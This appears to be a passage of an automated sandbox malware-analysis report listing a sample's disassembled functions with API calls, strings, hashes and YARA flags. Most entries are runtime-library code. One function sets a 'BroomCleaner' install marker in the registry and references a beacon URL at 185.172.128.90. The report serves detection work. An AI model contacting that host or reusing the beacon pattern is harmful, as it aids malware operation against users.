Instruction Fuzzy Hash: B611BC75100118BFDF01FF95D952DD93B65EF48358B42849AFD084F122D635EE919B44

Uniqueness

Uniqueness Score: -1.00%

Function 024E1417 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 024E141C
std::_Lockit::_Lockit.LIBCPMT ref: 024E142E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 024E146B

Part of subcall function 024E80E1: _Yarn.LIBCPMT ref: 024E8100
Part of subcall function 024E80E1: _Yarn.LIBCPMT ref: 024E8124

std::bad_exception::bad_exception.LIBCMT ref: 024E148C
__CxxThrowException@8.LIBVCRUNTIME ref: 024E149A
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 024E14BD
std::_Lockit::~_Lockit.LIBCPMT ref: 024E152E

Strings

n~B, xrefs: 024E1417

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: n~B
API String ID: 835844855-2489732092
Opcode ID: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction ID: e66e59e82c0f23df988ec18fd4a3f9ba26ca3cfe12afc0d5480d1b365ccbaa25
Opcode Fuzzy Hash: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction Fuzzy Hash: 6A315E71844B009FDB329F2AD94065BFBF5BF88711B108A2FE09F92A50CB75A905CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004011B5
std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204

Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD

std::bad_exception::bad_exception.LIBCMT ref: 00401225
__CxxThrowException@8.LIBVCRUNTIME ref: 00401233
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7

Strings

bad locale name, xrefs: 0040121D

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 835844855-1405518554
Opcode ID: ce3c0b23ff705215117f8776eb420a15f63c887abcc2888264ee72b3a4de71bc
Instruction ID: 0603089b66b0b819d6eff5d75331a99d5985645afad82bc6fef42f715fc6e5ae
Opcode Fuzzy Hash: ce3c0b23ff705215117f8776eb420a15f63c887abcc2888264ee72b3a4de71bc
Instruction Fuzzy Hash: E0319131904B40DEC7319F6AD941A5BFBF0BF08710B508A7FE05AA3A91C738B904CB59

Uniqueness

Uniqueness Score: -1.00%

Function 024F9514 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction ID: 0834ffb1c8f8313c4bc21026a579d83309bdd954f75716d194c4a0b3fd6667f0
Opcode Fuzzy Hash: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction Fuzzy Hash: C0C1B170E04349AFDF51DFA9C890BAEBBB5AF89314F08419BDA40AB391C7709941CF65

Uniqueness

Uniqueness Score: -1.00%

Function 024F4CB1 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024F6F80: GetLastError.KERNEL32(?,?,024EE697,?,?,?,024EED94,?), ref: 024F6F84
Part of subcall function 024F6F80: _free.LIBCMT ref: 024F6FB7
Part of subcall function 024F6F80: SetLastError.KERNEL32(00000000), ref: 024F6FF8
Part of subcall function 024F6F80: _abort.LIBCMT ref: 024F6FFE

_memcmp.LIBVCRUNTIME ref: 024F4F5B
_free.LIBCMT ref: 024F4FCC
_free.LIBCMT ref: 024F4FE5
_free.LIBCMT ref: 024F5017
_free.LIBCMT ref: 024F5020
_free.LIBCMT ref: 024F502C

Strings

C, xrefs: 024F4E19

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction ID: d3beaca86e5c4f83a520be90c85a037e860576db8d827f7ea6604c1f9985fe32
Opcode Fuzzy Hash: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction Fuzzy Hash: 1FB15D75A012199FDB64DF18C884BAEB7B5FF88304F5045AEDA49A7350EB31AE90CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

_memcmp.LIBVCRUNTIME ref: 00414CF4
_free.LIBCMT ref: 00414D65
_free.LIBCMT ref: 00414D7E
_free.LIBCMT ref: 00414DB0
_free.LIBCMT ref: 00414DB9
_free.LIBCMT ref: 00414DC5

Strings

C, xrefs: 00414BB2

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction ID: f1eb2fe4340e97ed79650f57c8a8747809c023f352878a21904a4d61aa040acb
Opcode Fuzzy Hash: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction Fuzzy Hash: B7B12975A012199BDB24DF18D884BEEB7B4FF88304F5045AAE849A7350E735AED1CF48

Uniqueness

Uniqueness Score: -1.00%

Function 004145CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

_free.LIBCMT ref: 004146D7
_free.LIBCMT ref: 004146EE
_free.LIBCMT ref: 0041470D
_free.LIBCMT ref: 00414728
_free.LIBCMT ref: 0041473F

Strings

|B, xrefs: 004146B1
B, xrefs: 0041461F

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free$AllocateHeap
String ID: B$|B
API String ID: 3033488037-200315465
Opcode ID: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction ID: bceed09af247e51911f2c06e24e965b8c83290834e1de00ea3c3fe4b0a612a45
Opcode Fuzzy Hash: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction Fuzzy Hash: F351E631A00304AFDB20DF66D841BAA77F4EF99728F14056EE849DB690E739DD81CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
__alloca_probe_16.LIBCMT ref: 004167D1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
__alloca_probe_16.LIBCMT ref: 004168B6
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
__freea.LIBCMT ref: 00416926

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

__freea.LIBCMT ref: 0041692F
__freea.LIBCMT ref: 00416954

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction ID: 945c2db0b5faf58cb0d9801c543b0b3226d139e5166d8e9d93898d86eb794442
Opcode Fuzzy Hash: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction Fuzzy Hash: 2B51E6B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFC04D6280DB38DC90C668

Uniqueness

Uniqueness Score: -1.00%

Function 024FF03E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024FF0AD
_free.LIBCMT ref: 024FF0BB
_free.LIBCMT ref: 024FF1E9
_free.LIBCMT ref: 024FF1F4

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction ID: 91107c3b07b04f490fdd42d26e530bd2f7dd5709dfa195d76ae34267f804c0c5
Opcode Fuzzy Hash: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction Fuzzy Hash: 0861E472900205AFDB61DFA9C840B9ABBF5EF88310F16416BEA54EB781DB719D41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDD7 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EE46
_free.LIBCMT ref: 0041EE54
_free.LIBCMT ref: 0041EF82
_free.LIBCMT ref: 0041EF8D

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction ID: e986a1f43705154f11102f288933750ce46d6c5c7240a2201f23140d39e68ccb
Opcode Fuzzy Hash: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction Fuzzy Hash: 6761A076904305AFDB20DF66C842BDABBF4EF48710F1441ABEC44EB281D7749D828B98

Uniqueness

Uniqueness Score: -1.00%

Function 024F4833 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024F7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 024F7CDE

_free.LIBCMT ref: 024F493E
_free.LIBCMT ref: 024F4955
_free.LIBCMT ref: 024F4974
_free.LIBCMT ref: 024F498F
_free.LIBCMT ref: 024F49A6

Strings

B, xrefs: 024F4886

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: B
API String ID: 3033488037-2386870291
Opcode ID: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction ID: f7c51915cd7384a5b3559ba58ffe189dbcee9e36bd1dedfaec54b0e639a86a41
Opcode Fuzzy Hash: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction Fuzzy Hash: 5F51B131A00205AFDB60DF6AD840B6B77F5FF84724B14456EEB49DB250EB31EA01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 024F5C7A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,024F63EF,?,?,?,?,?,?), ref: 024F5CBC
__fassign.LIBCMT ref: 024F5D37
__fassign.LIBCMT ref: 024F5D52
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 024F5D78
WriteFile.KERNEL32(?,?,00000000,024F63EF,00000000,?,?,?,?,?,?,?,?,?,024F63EF,?), ref: 024F5D97
WriteFile.KERNEL32(?,?,00000001,024F63EF,00000000,?,?,?,?,?,?,?,?,?,024F63EF,?), ref: 024F5DD0

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction ID: 607ad2876a498d5895a8bf9888a514a003629c73ffc5af6b10261baf36697c66
Opcode Fuzzy Hash: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction Fuzzy Hash: 3F51E471A002499FDB10CFA8D885BEEBBF8EF48300F14416BE655E7291E7309951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
__fassign.LIBCMT ref: 00415AD0
__fassign.LIBCMT ref: 00415AEB
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction ID: 93abb8da7f4b1ee22325e29d014a78f54aaad6af2ae94e442d530b7aeff6bc03
Opcode Fuzzy Hash: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction Fuzzy Hash: 7851E6B0A04609DFDB10CFA8D881BEEBBF4EF49310F14416BE955E7251D774A981CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040A6FB
___except_validate_context_record.LIBVCRUNTIME ref: 0040A703
_ValidateLocalCookies.LIBCMT ref: 0040A791
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A7BC
_ValidateLocalCookies.LIBCMT ref: 0040A811

Strings

csm, xrefs: 0040A7A6

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 23505c37bb0df54e9d772fc2403dd448dd449399a7c5e18b9979e78af1eb181c
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: B7415274E003089BCB10DF69C884A9EBBB5AF45318F14C17BE8156B3D2D739D925CB96

Uniqueness

Uniqueness Score: -1.00%

Function 025063C1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 025063C6
RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 025063EE
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 02506471
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 02506492

Strings

SOFTWARE\BroomCleaner, xrefs: 025063CE, 025063E1
Installed, xrefs: 025063D0, 025063FE, 0250641D, 0250641E

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction ID: 024ff722a786a0d60e93330d894534085408aa5b79a5d9e55e05ef1015f8c314
Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction Fuzzy Hash: 76315871A00229EEDF159FA9CC90AFEBB79FB49314F04416EE90277291C7711D05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004227A8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
Instruction ID: e24961ea6169977100e6de332b8cae97d730c3ba4f888c233ff9c32580c66a3b
Opcode Fuzzy Hash: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
Instruction Fuzzy Hash: 1611E7726081297BDB203F739D059AB3A6CDF92764B51062AFC15D7251DABCC84282B9

Uniqueness

Uniqueness Score: -1.00%

Function 024FF513 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024FF25A: _free.LIBCMT ref: 024FF283

_free.LIBCMT ref: 024FF561

Part of subcall function 024F6501: HeapFree.KERNEL32(00000000,00000000,?,024FF288,?,00000000,?,00000000,?,024FF52C,?,00000007,?,?,024FF920,?), ref: 024F6517
Part of subcall function 024F6501: GetLastError.KERNEL32(?,?,024FF288,?,00000000,?,00000000,?,024FF52C,?,00000007,?,?,024FF920,?,?), ref: 024F6529

_free.LIBCMT ref: 024FF56C
_free.LIBCMT ref: 024FF577
_free.LIBCMT ref: 024FF5CB
_free.LIBCMT ref: 024FF5D6
_free.LIBCMT ref: 024FF5E1
_free.LIBCMT ref: 024FF5EC

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: fa03afb06321ca2293a0db7e83a2218d67cf2b3cf214d62405b0a45f799bd161
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: C7115771540704B7DA70BBB1CC46FC77B9E6FC4700F47085EA7996A490DA66F5084E91

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2AC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041EFF3: _free.LIBCMT ref: 0041F01C

_free.LIBCMT ref: 0041F2FA

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F305
_free.LIBCMT ref: 0041F310
_free.LIBCMT ref: 0041F364
_free.LIBCMT ref: 0041F36F
_free.LIBCMT ref: 0041F37A
_free.LIBCMT ref: 0041F385

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: be7813cec9e76b844f682d4c097dbd82c10abeb52ecb146189267b1763b940f2
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: 1F114272541B24B6D920BB72DC07FCBB7DCBF44708F40081EBE9E66052DA7DB5868654

Uniqueness

Uniqueness Score: -1.00%

Function 024E43F0 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 024E43F5
std::_Lockit::_Lockit.LIBCPMT ref: 024E4404
int.LIBCPMT ref: 024E441B

Part of subcall function 024E157F: std::_Lockit::_Lockit.LIBCPMT ref: 024E1590
Part of subcall function 024E157F: std::_Lockit::~_Lockit.LIBCPMT ref: 024E15AA

std::locale::_Getfacet.LIBCPMT ref: 024E4424
std::_Facet_Register.LIBCPMT ref: 024E4455
std::_Lockit::~_Lockit.LIBCPMT ref: 024E446B
__CxxThrowException@8.LIBVCRUNTIME ref: 024E4491

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction ID: 4540943d12e083d7785927009a8334858ec3290dac4ea8a13e8677d9ccc40ad4
Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction Fuzzy Hash: 1511B6729001289BDF04EBA4DC04AEEB776EF84726F15455FE81BA7290DB749E01CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040418E
std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
int.LIBCPMT ref: 004041B4

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 004041BD
std::_Facet_Register.LIBCPMT ref: 004041EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
__CxxThrowException@8.LIBVCRUNTIME ref: 0040422A

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 7f04bc736b480ee01d3eae57bcb919a2b9243a76784e8c0ad09bcb8f93a2b6a7
Instruction ID: eeb1616ca6cccce41a0e0e35b82109652f5c3a79b41a9d78a32d17684d72b000
Opcode Fuzzy Hash: 7f04bc736b480ee01d3eae57bcb919a2b9243a76784e8c0ad09bcb8f93a2b6a7
Instruction Fuzzy Hash: AD119072A041289BCB04EBA5DC06AEE7774EF84358F10456FF915B72D1DB389A04C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 024E385C Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 024E3861
std::_Lockit::_Lockit.LIBCPMT ref: 024E3870
int.LIBCPMT ref: 024E3887

Part of subcall function 024E157F: std::_Lockit::_Lockit.LIBCPMT ref: 024E1590
Part of subcall function 024E157F: std::_Lockit::~_Lockit.LIBCPMT ref: 024E15AA

std::locale::_Getfacet.LIBCPMT ref: 024E3890
std::_Facet_Register.LIBCPMT ref: 024E38C1
std::_Lockit::~_Lockit.LIBCPMT ref: 024E38D7
__CxxThrowException@8.LIBVCRUNTIME ref: 024E38FD

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction ID: 8b4f08fcf051ee27ebfffe059788706ba93876e980aa93f3a4e4f1f647b72939
Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction Fuzzy Hash: 4F11BF72D001249BDF01EBA5C804AFEBBBAEF44722F14455FE927A7290DB749A04CB94

Uniqueness

Uniqueness Score: -1.00%

Function 024E3651 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 024E3656
std::_Lockit::_Lockit.LIBCPMT ref: 024E3665
int.LIBCPMT ref: 024E367C

Part of subcall function 024E157F: std::_Lockit::_Lockit.LIBCPMT ref: 024E1590
Part of subcall function 024E157F: std::_Lockit::~_Lockit.LIBCPMT ref: 024E15AA

std::locale::_Getfacet.LIBCPMT ref: 024E3685
std::_Facet_Register.LIBCPMT ref: 024E36B6
std::_Lockit::~_Lockit.LIBCPMT ref: 024E36CC
__CxxThrowException@8.LIBVCRUNTIME ref: 024E36F2

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

